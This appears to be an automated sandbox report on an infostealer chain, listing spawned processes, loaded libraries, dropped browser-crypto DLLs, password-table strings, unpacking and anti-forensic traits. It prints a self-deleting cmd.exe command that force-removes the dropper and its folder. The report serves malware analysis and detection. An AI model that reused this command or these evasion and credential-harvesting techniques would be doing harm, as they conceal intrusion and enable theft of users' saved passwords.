                Source: katB4C0.tmp, katB4C0.tmp, 0000000B.00000002.2809673734.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2810931368.0000000020219000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmp, sqls[1].dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: katB4C0.tmp, 0000000B.00000002.2809673734.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2810931368.0000000020219000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmp, sqls[1].dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                Source: katB4C0.tmp, 0000000B.00000002.2809673734.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2810931368.0000000020219000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.11.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                Source: 38F9.exe, 00000006.00000003.2032985420.0000000002C75000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032601893.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2481742648.0000000000A36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: katB4C0.tmp, 0000000B.00000002.2809673734.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2810931368.0000000020219000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.11.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                Source: katB4C0.tmp, 0000000B.00000002.2809673734.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2810931368.0000000020219000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.11.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                Source: softokn3.dll.11.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                Source: 2.exeReversingLabs: Detection: 39%
                Source: 2.exeVirustotal: Detection: 43%
                Source: unknownProcess created: C:\Users\user\Desktop\2.exe "C:\Users\user\Desktop\2.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\jssrvvh C:\Users\user\AppData\Roaming\jssrvvh
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\38F9.exe C:\Users\user\AppData\Local\Temp\38F9.exe
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7932 -s 1512
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D818.exe C:\Users\user\AppData\Local\Temp\D818.exe
                Source: C:\Users\user\AppData\Local\Temp\D818.exeProcess created: C:\Users\user\AppData\Local\Temp\katB4C0.tmp C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katB4C0.tmp" & rd /s /q "C:\ProgramData\FIEGCBKEGCFC" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\jssrvvh C:\Users\user\AppData\Roaming\jssrvvh
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\38F9.exe C:\Users\user\AppData\Local\Temp\38F9.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D818.exe C:\Users\user\AppData\Local\Temp\D818.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D818.exeProcess created: C:\Users\user\AppData\Local\Temp\katB4C0.tmp C:\Users\user\AppData\Local\Temp\katB4C0.tmpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katB4C0.tmp" & rd /s /q "C:\ProgramData\FIEGCBKEGCFC" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\2.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\2.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\2.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jssrvvhSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D818.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D818.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D818.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D818.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D818.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: sxs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: mozglue.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: msvcp140.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: dlnashext.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: wpdshext.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\jssrvvhSection loaded: msimg32.dll
                Source: C:\Users\user\AppData\Roaming\jssrvvhSection loaded: msvcr100.dll
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\2.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: 2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: mozglue.pdbP source: katB4C0.tmp, 0000000B.00000002.2822044307.000000006D0CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.11.dr
                Source: Binary string: freebl3.pdb source: freebl3.dll.11.dr
                Source: Binary string: freebl3.pdbp source: freebl3.dll.11.dr
                Source: Binary string: nss3.pdb@ source: katB4C0.tmp, 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr
                Source: Binary string: softokn3.pdb@ source: softokn3.dll.11.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.11.dr, vcruntime140[1].dll.11.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.11.dr, msvcp140.dll.11.dr
                Source: Binary string: nss3.pdb source: katB4C0.tmp, 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr
                Source: Binary string: mozglue.pdb source: katB4C0.tmp, 0000000B.00000002.2822044307.000000006D0CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.11.dr
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katB4C0.tmp, 0000000B.00000002.2809673734.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2810931368.0000000020219000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.11.dr
                Source: Binary string: softokn3.pdb source: softokn3.dll.11.dr

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\2.exeUnpacked PE file: 0.2.2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\jssrvvhUnpacked PE file: 5.2.jssrvvh.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeUnpacked PE file: 6.2.38F9.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                Source: C:\Users\user\AppData\Roaming\jssrvvhUnpacked PE file: 16.2.jssrvvh.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeUnpacked PE file: 6.2.38F9.exe.400000.0.unpack
                Source: sqls[1].dll.11.drStatic PE information: section name: .00cfg
                Source: freebl3.dll.11.drStatic PE information: section name: .00cfg
                Source: freebl3[1].dll.11.drStatic PE information: section name: .00cfg
                Source: mozglue.dll.11.drStatic PE information: section name: .00cfg
                Source: mozglue[1].dll.11.drStatic PE information: section name: .00cfg
                Source: msvcp140.dll.11.drStatic PE information: section name: .didat
                Source: msvcp140[1].dll.11.drStatic PE information: section name: .didat
                Source: nss3.dll.11.drStatic PE information: section name: .00cfg
                Source: nss3[1].dll.11.drStatic PE information: section name: .00cfg
                Source: softokn3.dll.11.drStatic PE information: section name: .00cfg
                Source: softokn3[1].dll.11.drStatic PE information: section name: .00cfg
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_00402CD7 push cs; retf 0_2_00402CD8
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_00401EA7 push 0000000Eh; retf 0038h0_2_00401EB6
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_004033B6 push eax; ret 0_2_00403419
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_02DE1F0E push 0000000Eh; retf 0038h0_2_02DE1F1D
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_02DE2D3E push cs; retf 0_2_02DE2D3F
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_02E398EC push 0000002Ah; iretd 0_2_02E39936
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_02E338B0 push 0000000Eh; retf 0038h0_2_02E338BF
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_02E34A96 push eax; ret 0_2_02E34A97
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_02E33840 push cs; retf 0038h0_2_02E338BF
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_02E34422 push cs; retf 0_2_02E34423
                Source: C:\Users\user\Desktop\2.exeCode function: 0_2_02E3340D push ss; iretw 0_2_02E3341F
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_00402CD7 push cs; retf 5_2_00402CD8
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_00401EA7 push 0000000Eh; retf 0038h5_2_00401EB6
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_004033B6 push eax; ret 5_2_00403419
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_02D91F0E push 0000000Eh; retf 0038h5_2_02D91F1D
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_02D92D3E push cs; retf 5_2_02D92D3F
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_02E532D8 push cs; retf 0038h5_2_02E53357
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_02E52EA5 push ss; iretw 5_2_02E52EB7
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_02E53EBA push cs; retf 5_2_02E53EBB
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_02E59384 push 0000002Ah; iretd 5_2_02E593CE
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_02E53348 push 0000000Eh; retf 0038h5_2_02E53357
                Source: C:\Users\user\AppData\Roaming\jssrvvhCode function: 5_2_02E5452E push eax; ret 5_2_02E5452F
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00441DE9 push ebp; ret 6_2_00441E02
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_00441FE4 pushad ; retf 0041h6_2_00441FE5
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_0058030D push ecx; ret 6_2_00580315
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005DD3D4 push ebp; retf 6_2_005DD3FB
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005DD422 push edx; retf 6_2_005DD423
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeCode function: 6_2_005DD602 push ss; retf 6_2_005DD603
                Source: C:\Users\user\AppData\Local\Temp\D818.exeCode function: 10_2_0437B010 push edx; ret 10_2_0437B21F
                Source: C:\Users\user\AppData\Local\Temp\D818.exeCode function: 10_2_0437A910 push edx; ret 10_2_0437A91B
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\38F9.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\ProgramData\FIEGCBKEGCFC\msvcp140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\ProgramData\FIEGCBKEGCFC\softokn3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\ProgramData\FIEGCBKEGCFC\vcruntime140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\ProgramData\FIEGCBKEGCFC\freebl3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\ProgramData\FIEGCBKEGCFC\nss3.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jssrvvhJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D818.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\D818.exeFile created: C:\Users\user\AppData\Local\Temp\katB4C0.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\ProgramData\FIEGCBKEGCFC\mozglue.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\ProgramData\FIEGCBKEGCFC\msvcp140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\ProgramData\FIEGCBKEGCFC\softokn3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\ProgramData\FIEGCBKEGCFC\vcruntime140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\ProgramData\FIEGCBKEGCFC\freebl3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\ProgramData\FIEGCBKEGCFC\nss3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpFile created: C:\ProgramData\FIEGCBKEGCFC\mozglue.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jssrvvhJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Deletes itself after installation
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\2.exeJump to behavior
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\jssrvvh:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38F9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
